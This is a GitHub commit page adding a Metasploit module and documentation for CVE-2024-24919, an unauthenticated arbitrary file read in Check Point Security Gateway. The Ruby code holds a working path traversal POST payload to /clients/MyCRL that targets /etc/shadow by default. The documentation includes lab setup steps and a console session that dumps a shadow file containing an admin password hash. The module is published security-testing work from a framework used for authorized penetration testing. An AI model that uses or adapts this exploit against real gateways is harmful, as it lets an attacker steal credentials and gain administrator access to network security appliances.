Skip to content

Commit

Permalink
Land #19221, CheckPoint Security Gateway file read
Browse files Browse the repository at this point in the history 
This module leverages an unauthenticated arbitrary root file read
vulnerability for Check Point Security Gateway appliances. When the
IPSec VPN or Mobile Access blades are enabled on affected devices,
traversal payloads can be used to read any files on the local file
system. This vulnerability is tracked as CVE-2024-24919.
  • Loading branch information
@jheysel-r7
jheysel-r7 committed Jun 13, 2024
2 parents 906a348 + 1abe3b9 commit 35d161b
Show file tree
Hide file tree
Showing 2 changed files with 218 additions and 0 deletions.
109 changes: 109 additions & 0 deletions ...entation/modules/auxiliary/gather/checkpoint_gateway_fileread_cve_2024_24919.md
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,109 @@
## Vulnerable Application
This module leverages an unauthenticated arbitrary root file read vulnerability for
Check Point Security Gateway appliances. When the IPSec VPN or Mobile Access blades
are enabled on affected devices, traversal payloads can be used to read any files on
the local file system. Password hashes read from disk may be cracked, potentially
resulting in administrator-level access to the target device. This vulnerability is
tracked as CVE-2024-24919.

## Options

### STORE_LOOT
Whether the read file's contents should be outputted to the console or stored as loot (default: false).

### TARGETFILE
The target file to read (default: /etc/shadow). This should be a full Linux file path. Files containing binary data may
not be read accurately.

## Testing
To set up a test environment:
1. Download an affected version of Check Point Security Gateway (Such as Check_Point_R81.20_T631.iso, SHA1:
42e25f45ab6b1694a97f76ca363d58040802e6d6).
1. Install the ISO within a virtual machine.
1. Browse to the administrator web dashboard on port 443 and complete the first-time setup tasks.
1. On a Windows system, download and install a copy of Check Point SmartConsole, then use it to authenticate to Security Gateway.
1. In SmartConsole, enable and configure the vulnerable Mobile Access or IPSec VPN blades. These instructions focus on Mobile Access:
1. Open the Gateway Properties:
1. Navigate to Gateways & Servers in the left-hand menu.
1. Select the gateway you want to configure.
1. Right-click on the gateway and select Edit.
1. Enable Mobile Access:
1. In the General Properties tab, under Network Security, check the box for Mobile Access.
1. Click on Mobile Access in the left-hand menu of the gateway properties window to access the Mobile Access settings.
1. Configure Mobile Access:
1. Set up the authentication methods under Authentication (e.g., LDAP, RADIUS, etc.).
1. Configure the Portal Settings, specifying the URL for the Mobile Access Portal.
1. Under Applications, define which applications and resources will be accessible via the Mobile Access portal.
1. Click OK to close the properties window.
1. Publish and push the configuration changes to the device.
1. In SmartConsole, after completing your configuration, click on the Publish button at the top right corner of the
SmartConsole window. This will save your changes to the management database.
1. After publishing the changes, click on the Install Policy button located at the top of the SmartConsole window.
1. In the Install Policy window, select the policy package you want to install. This is typically your main security policy package.
1. Choose the gateways on which you want to install the policy. Make sure to select the gateway that you configured
for Mobile Access and/or IPSec VPN.
1. Click Install to begin the installation process. Once this process completes the gateway should then be vulnerable to this module.


## Verification Steps
1. Start msfconsole
2. `use auxiliary/gather/checkpoint_gateway_fileread_cve_2024_24919`
3. `set RHOSTS <TARGET_IP_ADDRESS>`
4. `set RPORT <TARGET_PORT>`
5. `set TARGETFILE <TARGET_FILE_TO_READ>`
6. `set STORE_LOOT false` if you want to display the target file on the console instead of storing it as loot.
7. `run`

## Scenarios
### Check Point Security Gateway Linux
```
msf6 auxiliary(gather/checkpoint_gateway_fileread_cve_2024_24919) > show options
Module options (auxiliary/gather/checkpoint_gateway_fileread_cve_2024_24919):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 443 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
STORE_LOOT false yes Store the target file as loot
TARGETFILE /etc/shadow yes The target file to read. This should be a full Linux file path. Files containing binary data may not be read accurately
TARGETURI / yes The URI path to Check Point Security Gateway
VHOST no HTTP server virtual host
View the full module info with the info, or info -d command.
msf6 auxiliary(gather/checkpoint_gateway_fileread_cve_2024_24919) > set RHOSTS 192.168.181.128
RHOSTS => 192.168.181.128
msf6 auxiliary(gather/checkpoint_gateway_fileread_cve_2024_24919) > set SSL true
[!] Changing the SSL option's value may require changing RPORT!
SSL => true
msf6 auxiliary(gather/checkpoint_gateway_fileread_cve_2024_24919) > check
[+] 192.168.181.128:443 - The target is vulnerable. Arbitrary file read successful!
msf6 auxiliary(gather/checkpoint_gateway_fileread_cve_2024_24919) > run
[*] Running module against 192.168.181.128
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Arbitrary file read successful!
[+] File read succeeded!
admin:$6$hHJHiZdC2kHPD5HQ$/0dtMC53GSaZpLA/MeChOvJNNE4i9qoKL57Dsl853wF/RRNzJJ6CO5/qBmzCM7KdEUmXanF3J8T50ppLh/Sf2/:14559:0:99999:8:::
monitor:*:19872:0:99999:8:::
root:*:19872:0:99999:7:::
cp_routeevt:*:19872:0:99999:7:::
nobody:*:19872:0:99999:7:::
postfix:*:19872:0:99999:7:::
rpm:!!:19872:0:99999:7:::
shutdown:*:19872:0:99999:7:::
pcap:!!:19872:0:99999:7:::
halt:*:19872:0:99999:7:::
cp_postgres:*:19872:0:99999:7:::
cp_extensions:*:19872:0:99999:7:::
cpep_user:*:19872:0:99999:7:::
vcsa:!!:19872:0:99999:7:::
_nonlocl:*:19872:0:99999:7:::
sshd:*:19872:0:99999:7:::
[*] Auxiliary module execution completed
```
109 changes: 109 additions & 0 deletions modules/auxiliary/gather/checkpoint_gateway_fileread_cve_2024_24919.rb
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,109 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
prepend Msf::Exploit::Remote::AutoCheck

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Check Point Security Gateway Arbitrary File Read',
'Description' => %q{
This module leverages an unauthenticated arbitrary root file read vulnerability for
Check Point Security Gateway appliances. When the IPSec VPN or Mobile Access blades
are enabled on affected devices, traversal payloads can be used to read any files on
the local file system. Password hashes read from disk may be cracked, potentially
resulting in administrator-level access to the target device. This vulnerability is
tracked as CVE-2024-24919.
},
'Author' => [ 'remmons-r7' ],
'Notes' => {
'Stability' => [CRASH_SAFE],
# At the time of module development, no IOCs for this local file disclosure are known
'SideEffects' => [],
'Reliability' => []
},
'DefaultOptions' => { 'SSL' => true },
'References' => [
# Vendor advisory
[ 'URL', 'https://support.checkpoint.com/results/sk/sk182336' ],
# Rapid7 ETR advisory for CVE-2024-24919
[ 'URL', 'https://www.rapid7.com/blog/post/2024/05/30/etr-cve-2024-24919-check-point-security-gateway-information-disclosure/' ],
# Publication of first proof-of-concept exploit
[ 'URL', 'https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/' ]
]
)
)

register_options(
[
Opt::RPORT(443),
OptBool.new('STORE_LOOT', [true, 'Store the target file as loot', false]),
OptString.new('TARGETFILE', [true, 'The target file to read. This should be a full Linux file path. Files containing binary data may not be read accurately', '/etc/shadow']),
OptString.new('TARGETURI', [true, 'The URI path to Check Point Security Gateway', '/'])
]
)
end

def check
# Attempt to read the /etc/group file (used in check due to lower likelihood of being flagged vs something like /etc/shadow)
res_file = read_file('/etc/group')

# Check for connection failure
return Msf::Exploit::CheckCode::Unknown('Connection failed - unable to complete web request') unless res_file

# If the response body includes the string "root", we can assume the target is vulnerable
unless res_file.body.include?('root')
return Msf::Exploit::CheckCode::Safe('Arbitrary file read failed - the target did not respond with the requested file')
end

Msf::Exploit::CheckCode::Vulnerable('Arbitrary file read successful!')
end

def run
# After the auto check confirms the target is vulnerable, attempt to leak the specified target file
file_name = datastore['TARGETFILE']
res_read_file = read_file(file_name)

# Check for connection failure
fail_with(Failure::Unknown, 'Connection failed - unable to complete web request') unless res_read_file

# If the response indicates that the target file does not exist, fail with NotFound
if (res_read_file&.code == 404) || (res_read_file.body.include? 'The URL you requested could not be found on this server.')
fail_with(Failure::NotFound, 'The requested file was not found - the target file does not exist or the system cannot read it')
end

# If the vulnerable server responds with a status other than the expected 200 or 404 (for example, a WAF 403), fail with UnexpectedReply
if res_read_file&.code != 200
fail_with(Failure::UnexpectedReply, "The application did not respond with a 200 as expected - the HTTP response code was: #{res_read_file&.code}")
end

# Assign variable with file contents, then store the file in loot or print the contents
file_data = res_read_file.body

if datastore['STORE_LOOT']
store_loot(File.basename(file_name), 'text/plain', datastore['RHOST'], file_data, file_name, 'File read from Check Point Security Gateway server')
print_good('Stored the file data to loot...')
else
# A new line is sent before file contents for better readability
print_good("File read succeeded! \n#{file_data}")
end
end

# Performs a POST request with a traversal payload in the body
# Responses should either be a 200 with only the file contents in the body or a 404 for files that do not exist
def read_file(fname)
send_request_cgi(
{
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'clients', 'MyCRL'),
'headers' => { 'Connection' => 'close' },
'data' => "aCSHELL/../../../../../../../../../..#{fname}"
}
)
end
end

0 comments on commit 35d161b

Please sign in to comment.